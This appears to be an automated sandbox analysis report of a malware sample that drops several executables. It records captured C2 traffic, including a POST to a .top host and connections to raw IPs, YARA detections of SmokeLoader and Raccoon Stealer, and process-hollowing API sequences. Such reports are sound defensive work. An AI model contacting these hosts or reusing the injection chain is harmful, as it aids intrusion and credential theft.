3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 26 0b 04 59 b9 1d 6d f5 e9 e6 a1 29 7a 3a 62 c3 cc a7 43 ec 44 d7 6b 50 78 18 e0 30 8a 3c a2 61 a3 d6 d4 22 a2 58 d5 5b 2d 22 ad 88 88 5e 6f d7 9f b7 ee bc db 32 b9 9a 4c ca 4c 08 03 d4 d2 a1 97 c6 37 13 4b 42 c4 d4 5a c6 ca 23 e8 16 41 bf 6c 13 d9 c8 9f 57 db 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 88 b6 4b 24 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f eb 92 24 82 45 c5 03 49 bd a3 61 7e de f5 69 33 11 17 7e 4f af 9a a5 e4 c3 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 41 48 9a 07 fd ec 23 20 77 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 20 c6 4f 6b 79 82 ae 9c a7 82 4e 95 1f ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 75 6c e5 ee 30 4c 80 f0 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 9a 70 f7 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bb 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 39 07 bd 1b 6f d3 cb 29 32 a2 ed 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 13 61 6a e6 a6 dd 1a 9f 10 af d9 b0 99 89 93 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e1 33 17 28 d2 9e c6 1d d0 eb aa 7a 8f 52 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 75 82 71 d4 03 6b 2c 9a 76 48 0e ca 82 21 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:56:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.181
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agvlhndt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.6:49815 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 15.1.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.8908.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.8908.exe.2b615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.y8WngeDn4q.exe.47615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.y8WngeDn4q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.esdfufc.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.1.esdfufc.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.4EDC.exe.3090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.4EDC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.esdfufc.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.8908.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.412091703.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482521678.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.394109827.0000000002801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.530637179.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.529516403.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.411806433.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.511213614.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.482408758.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.559098642.00000000049E1000.00000004.00020000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 6E1E.exe, 0000001B.00000002.558082279.0000000002DDA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR

System Summary:

.NET source code contains very large array initializations
Source: 3FD8.exe.6.dr, ???????????????.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Source: D083.exe.6.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022430 22_2_6C022430
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C000D20 22_2_6C000D20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022D50 22_2_6C022D50
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D1D55 22_2_6C0D1D55
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0335D0 22_2_6C0335D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C026E30 22_2_6C026E30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D2EF7 22_2_6C0D2EF7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032F70 22_2_6C032F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C67E2 22_2_6C0C67E2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE7FF 22_2_6C0BE7FF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1002 22_2_6C0C1002
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C038840 22_2_6C038840
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B090 22_2_6C01B090
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022990 22_2_6C022990
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFA2B 22_2_6C0BFA2B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D32A9 22_2_6C0D32A9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CE2C5 22_2_6C0CE2C5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02AB40 22_2_6C02AB40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C023360 22_2_6C023360
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03EBB0 22_2_6C03EBB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03ABD8 22_2_6C03ABD8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B23E3 22_2_6C0B23E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C058BE8 22_2_6C058BE8
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004368D0 27_2_004368D0
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_0041EDCE 27_2_0041EDCE
PE file contains strange resources
Source: 4EDC.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C651.exe.6.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: E11F.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csdfufc.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.19.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Uses 32bit PE files
Source: y8WngeDn4q.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 24.0.60DF.exe.440000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.60DF.exe.440000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.3FD8.exe.2f0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.60DF.exe.440000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.2.D083.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.60DF.exe.440000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 43.0.D083.exe.720000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.37D8.exe.ff0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\60DF.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\D083.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\FC0C.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\37D8.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: String function: 0041D100 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: String function: 004212E0 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: String function: 6C095720 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: String function: 6C00B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: String function: 6C05D08C appears 41 times
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_04760110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_04760110
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040185B Sleep,NtTerminateProcess, 3_2_0040185B
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_00401866 Sleep,NtTerminateProcess, 3_2_00401866
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040187A Sleep,NtTerminateProcess, 3_2_0040187A
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040163B NtMapViewOfSection, 3_2_0040163B
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_004018D3 NtTerminateProcess, 3_2_004018D3
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_00401884 Sleep,NtTerminateProcess, 3_2_00401884
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_00401888 NtTerminateProcess, 3_2_00401888
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_0040156A NtMapViewOfSection, 3_2_0040156A
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_2_004015DB
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_2_004017EA Sleep,NtTerminateProcess, 3_2_004017EA
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_1_0040156A NtMapViewOfSection, 3_1_0040156A
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_1_004015DB
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 3_1_0040163B NtMapViewOfSection, 3_1_0040163B
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_02CB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 12_2_02CB0110
Source: C:\Users\user\AppData\Local\Temp\8908.exe Code function: 13_2_02B60110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 13_2_02B60110
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040185B Sleep,NtTerminateProcess, 14_2_0040185B
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_00401866 Sleep,NtTerminateProcess, 14_2_00401866
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040187A Sleep,NtTerminateProcess, 14_2_0040187A
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040163B NtMapViewOfSection, 14_2_0040163B
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_004018D3 NtTerminateProcess, 14_2_004018D3
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_00401884 Sleep,NtTerminateProcess, 14_2_00401884
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_00401888 NtTerminateProcess, 14_2_00401888
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_0040156A NtMapViewOfSection, 14_2_0040156A
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 14_2_004015DB
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 14_2_004017EA Sleep,NtTerminateProcess, 14_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_0040181C Sleep,NtTerminateProcess, 22_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402406 NtEnumerateKey, 22_2_00402406
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00401F25 NtQuerySystemInformation, 22_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00401828 Sleep,NtTerminateProcess, 22_2_00401828
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_00402431 NtEnumerateKey, 22_2_00402431
